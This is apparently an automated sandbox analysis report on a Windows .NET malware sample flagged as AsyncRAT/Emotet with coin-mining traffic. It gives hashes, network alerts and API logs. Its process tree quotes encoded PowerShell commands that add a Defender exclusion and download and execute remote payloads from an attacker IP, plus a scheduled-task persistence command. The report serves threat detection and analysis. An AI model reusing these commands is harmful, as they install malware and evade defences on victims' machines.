Summary | ZeroBOX

Category	Machine	Started	Completed
FILE	s1_win7_x6401	May 6, 2023, 12:05 p.m.	May 6, 2023, 12:16 p.m.

Size	82.5KB
Type	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
MD5	`0e4e3cdacfbe29fdc3e189e52ee8228e`
SHA256	`ac3af6bd3139c444e8e146a6d48c110ae33c09d23c84b7b02f3d7af9eaa49c84`
CRC32	`DA1BDEA1`
ssdeep	`1536:Vdbe0uWRLLmR/epMMj1McUa33271MT1AosEeR9m+dIs:Tb/RLLmJMMMjK63E1MT1zr+dp`
PDB Path	C:\Users\xD\source\repos\Update\Update\obj\Release\NKSSD.pdb
Yara	Win32_Trojan_Emotet_2_Zero - Win32 Trojan Emotet Is_DotNET_EXE - (no description) Malicious_Packer_Zero - Malicious Packer Win_Backdoor_AsyncRAT_Zero - Win Backdoor AsyncRAT IsPE32 - (no description) PE_Header_Zero - PE File Signature

file.exe "C:\Users\test22\AppData\Local\Temp\file.exe"
2556
- powershell.exe "powershell" -enc IABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQwA6AFwA
  2652
- powershell.exe "powershell" -enc JABmADUAPQAnAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvACcAOwAgACQAZgAxAD0AJwAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQAnADsAIAAkAGYAMwA9ACcAYQBkAFMAdAByAGkAbgBnACgAJwAnAGgAdAB0AHAAOgAvAC8ANgAyAC4AMgAwADQALgA0ADEALgAyADMALwBvAC4AcABuAGcAJwAnACkAJwA7ACQARwBPAE8APQBJAGAARQBgAFgAIAAoACQAZgAxACwAJABmADUALAAkAGYAMwAgAC0ASgBvAGkAbgAgACcAJwApAHwASQBgAEUAYABYAA==
  2704
- powershell.exe "powershell" -enc JABmADUAPQAnAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvACcAOwAgACQAZgAxAD0AJwAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQAnADsAIAAkAGYAMwA9ACcAYQBkAFMAdAByAGkAbgBnACgAJwAnAGgAdAB0AHAAOgAvAC8ANgAyAC4AMgAwADQALgA0ADEALgAyADMALwBmAGkAbABlAC4AcABuAGcAJwAnACkAJwA7ACQARwBPAE8APQBJAGAARQBgAFgAIAAoACQAZgAxACwAJABmADUALAAkAGYAMwAgAC0ASgBvAGkAbgAgACcAJwApAHwASQBgAEUAYABYAA==
  2756
  - OneDrive.exe "C:\Users\test22\AppData\Roaming\OneDrive.exe"
    1596
  - dllhost.exe "C:\Users\test22\AppData\Roaming\dllhost.exe"
    2008
  - lsass.exe "C:\Users\test22\AppData\Roaming\lsass.exe"
    2576
    - schtasks.exe "schtasks.exe" /create /tn OneDrive /tr "C:\ProgramData\lsass\lsass.exe" /st 18:52 /du 23:59 /sc daily /ri 1 /f
      1180
    - lsass.exe "C:\ProgramData\lsass\lsass.exe"
      2612
    - cmd.exe cmd /c ""C:\Users\test22\AppData\Local\Temp\tmp8FE2.tmp.bat""
      1552
      - timeout.exe timeout 7
        2904
- powershell.exe "powershell" -enc JABmADUAPQAnAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvACcAOwAgACQAZgAxAD0AJwAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQAnADsAIAAkAGYAMwA9ACcAYQBkAFMAdAByAGkAbgBnACgAJwAnAGgAdAB0AHAAOgAvAC8ANgAyAC4AMgAwADQALgA0ADEALgAyADMALwByAC4AcABuAGcAJwAnACkAJwA7ACQARwBPAE8APQBJAGAARQBgAFgAIAAoACQAZgAxACwAJABmADUALAAkAGYAMwAgAC0ASgBvAGkAbgAgACcAJwApAHwASQBgAEUAYABYAA==
  2808

Name	Response	Post-Analysis Lookup
pool.hashvault.pro	A 131.153.76.130 A 125.253.92.50	142.202.242.45
maper.info	A 148.251.234.93	148.251.234.93

IP Address	Status	Action
125.253.92.50	Active	Moloch
148.251.234.93	Active	Moloch
164.124.101.2	Active	Moloch
62.204.41.23	Active	Moloch

Suricata Alerts

Flow	SID	Signature	Category
TCP 62.204.41.23:80 -> 192.168.56.101:49168	2402000	ET DROP Dshield Block Listed Source group 1	Misc Attack
TCP 62.204.41.23:80 -> 192.168.56.101:49169	2014819	ET INFO Packed Executable Download	Misc activity
TCP 62.204.41.23:80 -> 192.168.56.101:49169	2018959	ET POLICY PE EXE or DLL Windows file download HTTP	Potential Corporate Privacy Violation
TCP 62.204.41.23:80 -> 192.168.56.101:49169	2016538	ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download	Potentially Bad Traffic
TCP 62.204.41.23:80 -> 192.168.56.101:49169	2021076	ET HUNTING SUSPICIOUS Dotted Quad Host MZ Response	Potentially Bad Traffic
TCP 62.204.41.23:80 -> 192.168.56.101:49168	2035769	ET HUNTING [TW] Likely Hex Executable String	Misc activity
TCP 62.204.41.23:80 -> 192.168.56.101:49168	2020482	ET WEB_CLIENT DRIVEBY GENERIC ShellExecute in Hex No Seps	A Network Trojan was detected
TCP 62.204.41.23:80 -> 192.168.56.101:49170	2035769	ET HUNTING [TW] Likely Hex Executable String	Misc activity
UDP 192.168.56.101:59002 -> 164.124.101.2:53	2036289	ET COINMINER CoinMiner Domain in DNS Lookup (pool .hashvault .pro)	Crypto Currency Mining Activity Detected
TCP 192.168.56.101:49173 -> 125.253.92.50:80	2024792	ET POLICY Cryptocurrency Miner Checkin	Potential Corporate Privacy Violation
TCP 192.168.56.101:49180 -> 148.251.234.93:443	2026897	ET POLICY IP Logger Redirect Domain in SNI	Potential Corporate Privacy Violation
TCP 192.168.56.101:49180 -> 148.251.234.93:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49179 -> 148.251.234.93:443	2026897	ET POLICY IP Logger Redirect Domain in SNI	Potential Corporate Privacy Violation
TCP 192.168.56.101:49179 -> 148.251.234.93:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49180 -> 148.251.234.93:443	2026897	ET POLICY IP Logger Redirect Domain in SNI	Potential Corporate Privacy Violation
TCP 192.168.56.101:49179 -> 148.251.234.93:443	2026897	ET POLICY IP Logger Redirect Domain in SNI	Potential Corporate Privacy Violation
TCP 192.168.56.101:49179 -> 148.251.234.93:443	2026897	ET POLICY IP Logger Redirect Domain in SNI	Potential Corporate Privacy Violation
TCP 192.168.56.101:49180 -> 148.251.234.93:443	2026897	ET POLICY IP Logger Redirect Domain in SNI	Potential Corporate Privacy Violation

Suricata TLS

No Suricata TLS

Queries for the computername (31 events)

Time & API	Arguments	Status	Return
GetComputerNameW May 6, 2023, 11:59 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW May 6, 2023, 11:59 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW May 6, 2023, 11:59 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW May 6, 2023, 11:59 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameA May 6, 2023, 11:59 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW May 6, 2023, 11:59 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW May 6, 2023, 11:59 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW May 6, 2023, 11:59 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW May 6, 2023, 11:59 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW May 6, 2023, 11:59 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameA May 6, 2023, 11:59 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW May 6, 2023, 11:59 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW May 6, 2023, 11:59 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW May 6, 2023, 11:59 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW May 6, 2023, 11:59 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW May 6, 2023, 11:59 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW May 6, 2023, 11:59 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameA May 6, 2023, 11:59 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW May 6, 2023, 11:59 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW May 6, 2023, 11:59 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW May 6, 2023, 11:59 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW May 6, 2023, 11:59 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW May 6, 2023, 11:59 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW May 6, 2023, 11:59 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameA May 6, 2023, 11:59 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW May 6, 2023, 11:59 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW May 6, 2023, 11:59 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameA May 6, 2023, 12:07 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW May 6, 2023, 12:07 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW May 6, 2023, 12:07 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameA May 6, 2023, 12:07 p.m.	computer_name: TEST22-PC	1	1

Checks if process is being debugged by a debugger (26 events)

Time & API	Arguments	Status	Return	Repeated
IsDebuggerPresent May 6, 2023, 11:58 a.m.			0	0
IsDebuggerPresent May 6, 2023, 11:58 a.m.			0	0
IsDebuggerPresent May 6, 2023, 11:59 a.m.			0	0
IsDebuggerPresent May 6, 2023, 11:59 a.m.			0	0
IsDebuggerPresent May 6, 2023, 11:59 a.m.			0	0
IsDebuggerPresent May 6, 2023, 11:59 a.m.			0	0
IsDebuggerPresent May 6, 2023, 12:07 p.m.			0	0
IsDebuggerPresent May 6, 2023, 12:07 p.m.			0	0
IsDebuggerPresent May 6, 2023, 12:07 p.m.			0	0
IsDebuggerPresent May 6, 2023, 12:07 p.m.			0	0
IsDebuggerPresent May 6, 2023, 12:07 p.m.			0	0
IsDebuggerPresent May 6, 2023, 12:07 p.m.			0	0
IsDebuggerPresent May 6, 2023, 12:07 p.m.			0	0
IsDebuggerPresent May 6, 2023, 12:07 p.m.			0	0
IsDebuggerPresent May 6, 2023, 12:07 p.m.			0	0
IsDebuggerPresent May 6, 2023, 12:07 p.m.			0	0
IsDebuggerPresent May 6, 2023, 12:07 p.m.			0	0
IsDebuggerPresent May 6, 2023, 12:07 p.m.			0	0
IsDebuggerPresent May 6, 2023, 12:07 p.m.			0	0
IsDebuggerPresent May 6, 2023, 12:07 p.m.			0	0
IsDebuggerPresent May 6, 2023, 12:07 p.m.			0	0
IsDebuggerPresent May 6, 2023, 12:07 p.m.			0	0
IsDebuggerPresent May 6, 2023, 12:07 p.m.			0	0
IsDebuggerPresent May 6, 2023, 12:07 p.m.			0	0
IsDebuggerPresent May 6, 2023, 12:07 p.m.			0	0
IsDebuggerPresent May 6, 2023, 12:07 p.m.			0	0

Command line console output was observed (1 event)

Time & API	Arguments	Status	Return	Repeated
WriteConsoleW May 6, 2023, 12:07 p.m.	buffer: The batch file cannot be found. console_handle: 0x0000000b	1	1	0

Uses Windows APIs to generate a cryptographic key (50 out of 195 events)

Time & API	Arguments	Status	Return
CryptExportKey May 6, 2023, 11:59 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0000000000391c40 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey May 6, 2023, 11:59 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b3b2770 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey May 6, 2023, 11:59 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b3b2770 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey May 6, 2023, 11:59 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b3b2770 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey May 6, 2023, 11:59 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b3b2770 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey May 6, 2023, 11:59 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b3b2770 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey May 6, 2023, 11:59 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b3b22a0 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey May 6, 2023, 11:59 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b3b22a0 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey May 6, 2023, 11:59 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b3b22a0 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey May 6, 2023, 11:59 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b3b22a0 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey May 6, 2023, 11:59 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b3b2bd0 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey May 6, 2023, 11:59 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b3b2bd0 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey May 6, 2023, 11:59 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b3b2bd0 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey May 6, 2023, 11:59 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b3b30a0 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey May 6, 2023, 11:59 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b3b30a0 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey May 6, 2023, 11:59 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b3b30a0 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey May 6, 2023, 11:59 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b3b3110 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey May 6, 2023, 11:59 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b3b3110 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey May 6, 2023, 11:59 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b3b3110 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey May 6, 2023, 11:59 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b3b3110 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey May 6, 2023, 11:59 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b3b3110 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey May 6, 2023, 11:59 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b3b3110 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey May 6, 2023, 11:59 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b3b3110 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey May 6, 2023, 11:59 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b3b3110 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey May 6, 2023, 11:59 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b3b3180 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey May 6, 2023, 11:59 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b3b3180 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey May 6, 2023, 11:59 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b3b3180 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey May 6, 2023, 11:59 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b3b30a0 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey May 6, 2023, 11:59 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b3b30a0 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey May 6, 2023, 11:59 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b3b2f50 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey May 6, 2023, 11:59 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b3b2f50 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey May 6, 2023, 11:59 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b3b31f0 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey May 6, 2023, 11:59 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b3b31f0 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey May 6, 2023, 11:59 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b3b31f0 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey May 6, 2023, 11:59 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00000000003762d0 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey May 6, 2023, 11:59 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00000000003762d0 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey May 6, 2023, 11:59 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b3963f0 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey May 6, 2023, 11:59 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b3963f0 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey May 6, 2023, 11:59 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b3cd720 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey May 6, 2023, 11:59 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b3cd720 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey May 6, 2023, 11:59 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b3cda30 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey May 6, 2023, 11:59 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b3cda30 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey May 6, 2023, 11:59 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b3cdcd0 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey May 6, 2023, 11:59 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b3cdcd0 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey May 6, 2023, 11:59 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b3cdcd0 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey May 6, 2023, 11:59 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b3cdcd0 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey May 6, 2023, 11:59 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00000000002d3910 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey May 6, 2023, 11:59 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b565fe0 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey May 6, 2023, 11:59 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b565fe0 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey May 6, 2023, 11:59 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b565fe0 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1

Collects information to fingerprint the system (MachineGuid, DigitalProductId, SystemBiosDate) (1 event)

registry

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\MachineGuid

This executable has a PDB path (1 event)

pdb_path

C:\Users\xD\source\repos\Update\Update\obj\Release\NKSSD.pdb

Checks amount of memory in system, this can be used to detect virtual machines that have a low amount of memory available (1 event)

Time & API	Arguments	Status	Return	Repeated
GlobalMemoryStatusEx May 6, 2023, 11:58 a.m.		1	1	0

One or more processes crashed (50 out of 167 events)

Time & API	Arguments	Status
__exception__ May 6, 2023, 12:07 p.m.	stacktrace: RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x76f49ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x76f49ea5 exception.instruction_r: fb e9 4e 01 00 00 60 8b 74 24 24 8b 7c 24 28 fc exception.symbol: dllhost+0x29b0b9 exception.instruction: sti exception.module: dllhost.exe exception.exception_code: 0xc0000096 exception.offset: 2732217 exception.address: 0x69b0b9 registers.esp: 1638276 registers.edi: 0 registers.eax: 1 registers.ebp: 1638292 registers.edx: 8626176 registers.ebx: 2130567168 registers.esi: 0 registers.ecx: 0	1
__exception__ May 6, 2023, 12:07 p.m.	stacktrace: exception.instruction_r: fb 55 89 14 24 89 2c 24 89 14 24 56 52 68 e1 4c exception.symbol: dllhost+0x984e exception.instruction: sti exception.module: dllhost.exe exception.exception_code: 0xc0000096 exception.offset: 38990 exception.address: 0x40984e registers.esp: 1638244 registers.edi: 1968898280 registers.eax: 4259585 registers.ebp: 3974000660 registers.edx: 4194304 registers.ebx: 304388560 registers.esi: 3 registers.ecx: 1969094656	1
__exception__ May 6, 2023, 12:07 p.m.	stacktrace: exception.instruction_r: fb 53 89 2c 24 68 35 fd db 77 ff 34 24 5d 83 c4 exception.symbol: dllhost+0x9690 exception.instruction: sti exception.module: dllhost.exe exception.exception_code: 0xc0000096 exception.offset: 38544 exception.address: 0x409690 registers.esp: 1638244 registers.edi: 1968898280 registers.eax: 4233685 registers.ebp: 3974000660 registers.edx: 0 registers.ebx: 241897 registers.esi: 3 registers.ecx: 1969094656	1
__exception__ May 6, 2023, 12:07 p.m.	stacktrace: exception.instruction_r: fb 68 ba 89 99 62 e9 00 00 00 00 89 2c 24 57 54 exception.symbol: dllhost+0xa91f exception.instruction: sti exception.module: dllhost.exe exception.exception_code: 0xc0000096 exception.offset: 43295 exception.address: 0x40a91f registers.esp: 1638244 registers.edi: 1968898280 registers.eax: 4237940 registers.ebp: 3974000660 registers.edx: 0 registers.ebx: 1070462665 registers.esi: 0 registers.ecx: 1259	1
__exception__ May 6, 2023, 12:07 p.m.	stacktrace: exception.instruction_r: fb 53 bb 83 a5 57 37 81 ea e6 c9 fe 3b 01 da 50 exception.symbol: dllhost+0x1857fe exception.instruction: sti exception.module: dllhost.exe exception.exception_code: 0xc0000096 exception.offset: 1595390 exception.address: 0x5857fe registers.esp: 1638240 registers.edi: 4270840 registers.eax: 32915 registers.ebp: 3974000660 registers.edx: 5788163 registers.ebx: 16384 registers.esi: 5787641 registers.ecx: 3888906240	1
__exception__ May 6, 2023, 12:07 p.m.	stacktrace: exception.instruction_r: fb 81 ec 04 00 00 00 89 14 24 ba 78 5b 12 13 50 exception.symbol: dllhost+0x1855a0 exception.instruction: sti exception.module: dllhost.exe exception.exception_code: 0xc0000096 exception.offset: 1594784 exception.address: 0x5855a0 registers.esp: 1638244 registers.edi: 4270840 registers.eax: 32915 registers.ebp: 3974000660 registers.edx: 5821078 registers.ebx: 16384 registers.esi: 5787641 registers.ecx: 3888906240	1
__exception__ May 6, 2023, 12:07 p.m.	stacktrace: exception.instruction_r: fb e9 3c 02 00 00 31 2c 24 e9 97 f8 ff ff ba e1 exception.symbol: dllhost+0x185a0a exception.instruction: sti exception.module: dllhost.exe exception.exception_code: 0xc0000096 exception.offset: 1595914 exception.address: 0x585a0a registers.esp: 1638244 registers.edi: 4270840 registers.eax: 32915 registers.ebp: 3974000660 registers.edx: 5791218 registers.ebx: 16384 registers.esi: 0 registers.ecx: 363286888	1
__exception__ May 6, 2023, 12:07 p.m.	stacktrace: exception.instruction_r: fb 68 95 c0 0e 61 89 04 24 52 ba 21 d6 9f 7a 89 exception.symbol: dllhost+0x18b2c1 exception.instruction: sti exception.module: dllhost.exe exception.exception_code: 0xc0000096 exception.offset: 1618625 exception.address: 0x58b2c1 registers.esp: 1638244 registers.edi: 5841601 registers.eax: 31405 registers.ebp: 3974000660 registers.edx: 2130566132 registers.ebx: 23527783 registers.esi: 0 registers.ecx: 359	1
__exception__ May 6, 2023, 12:07 p.m.	stacktrace: exception.instruction_r: fb 83 ec 04 89 14 24 89 2c 24 68 8f f4 8d 4a 89 exception.symbol: dllhost+0x18aa6c exception.instruction: sti exception.module: dllhost.exe exception.exception_code: 0xc0000096 exception.offset: 1616492 exception.address: 0x58aa6c registers.esp: 1638244 registers.edi: 5813405 registers.eax: 31405 registers.ebp: 3974000660 registers.edx: 0 registers.ebx: 1549541099 registers.esi: 0 registers.ecx: 359	1
__exception__ May 6, 2023, 12:07 p.m.	stacktrace: exception.instruction_r: fb 52 e9 e4 04 00 00 5a 29 c7 56 be 54 d9 77 3f exception.symbol: dllhost+0x192b12 exception.instruction: sti exception.module: dllhost.exe exception.exception_code: 0xc0000096 exception.offset: 1649426 exception.address: 0x592b12 registers.esp: 1638244 registers.edi: 12725774 registers.eax: 27738 registers.ebp: 3974000660 registers.edx: 4294942528 registers.ebx: 1114345 registers.esi: 5870850 registers.ecx: 1969148396	1
__exception__ May 6, 2023, 12:07 p.m.	stacktrace: exception.instruction_r: ed 64 8f 05 00 00 00 00 51 e9 f1 10 00 00 81 6c exception.symbol: dllhost+0x1970b6 exception.instruction: in eax, dx exception.module: dllhost.exe exception.exception_code: 0xc0000096 exception.offset: 1667254 exception.address: 0x5970b6 registers.esp: 1638236 registers.edi: 12725774 registers.eax: 1447909480 registers.ebp: 3974000660 registers.edx: 22104 registers.ebx: 1969033397 registers.esi: 5850246 registers.ecx: 20	1
__exception__ May 6, 2023, 12:07 p.m.	stacktrace: exception.instruction_r: 0f 3f 07 0b 64 8f 05 00 00 00 00 83 c4 04 83 fb exception.symbol: dllhost+0x194779 exception.address: 0x594779 exception.module: dllhost.exe exception.exception_code: 0xc000001d exception.offset: 1656697 registers.esp: 1638236 registers.edi: 12725774 registers.eax: 1 registers.ebp: 3974000660 registers.edx: 22104 registers.ebx: 0 registers.esi: 5850246 registers.ecx: 20	1
__exception__ May 6, 2023, 12:07 p.m.	stacktrace: exception.instruction_r: ed 81 fb 68 58 4d 56 75 0a c7 85 5a 2b 62 13 01 exception.symbol: dllhost+0x1951c2 exception.instruction: in eax, dx exception.module: dllhost.exe exception.exception_code: 0xc0000096 exception.offset: 1659330 exception.address: 0x5951c2 registers.esp: 1638236 registers.edi: 12725774 registers.eax: 1447909480 registers.ebp: 3974000660 registers.edx: 22104 registers.ebx: 2256917605 registers.esi: 5850246 registers.ecx: 10	1
__exception__ May 6, 2023, 12:07 p.m.	stacktrace: exception.instruction_r: cd 01 eb 00 e9 11 00 00 00 bd 91 00 c7 1d 28 0c exception.symbol: dllhost+0x19cd77 exception.instruction: int 1 exception.module: dllhost.exe exception.exception_code: 0xc0000005 exception.offset: 1690999 exception.address: 0x59cd77 registers.esp: 1638204 registers.edi: 0 registers.eax: 1638204 registers.ebp: 3974000660 registers.edx: 1922666688 registers.ebx: 5885526 registers.esi: 10 registers.ecx: 3283596458	1
__exception__ May 6, 2023, 12:07 p.m.	stacktrace: exception.instruction_r: fb 50 68 92 8b 88 21 89 1c 24 56 be 6c 40 f4 5f exception.symbol: dllhost+0x19d81a exception.instruction: sti exception.module: dllhost.exe exception.exception_code: 0xc0000096 exception.offset: 1693722 exception.address: 0x59d81a registers.esp: 1638240 registers.edi: 12725774 registers.eax: 27232 registers.ebp: 3974000660 registers.edx: 3311213517 registers.ebx: 48161859 registers.esi: 5886330 registers.ecx: 3311217109	1
__exception__ May 6, 2023, 12:07 p.m.	stacktrace: exception.instruction_r: fb 51 c7 04 24 00 f5 7a 44 ff 34 24 5b 53 89 0c exception.symbol: dllhost+0x19d6de exception.instruction: sti exception.module: dllhost.exe exception.exception_code: 0xc0000096 exception.offset: 1693406 exception.address: 0x59d6de registers.esp: 1638244 registers.edi: 12725774 registers.eax: 6379 registers.ebp: 3974000660 registers.edx: 3311213517 registers.ebx: 4294942320 registers.esi: 5913562 registers.ecx: 3311217109	1
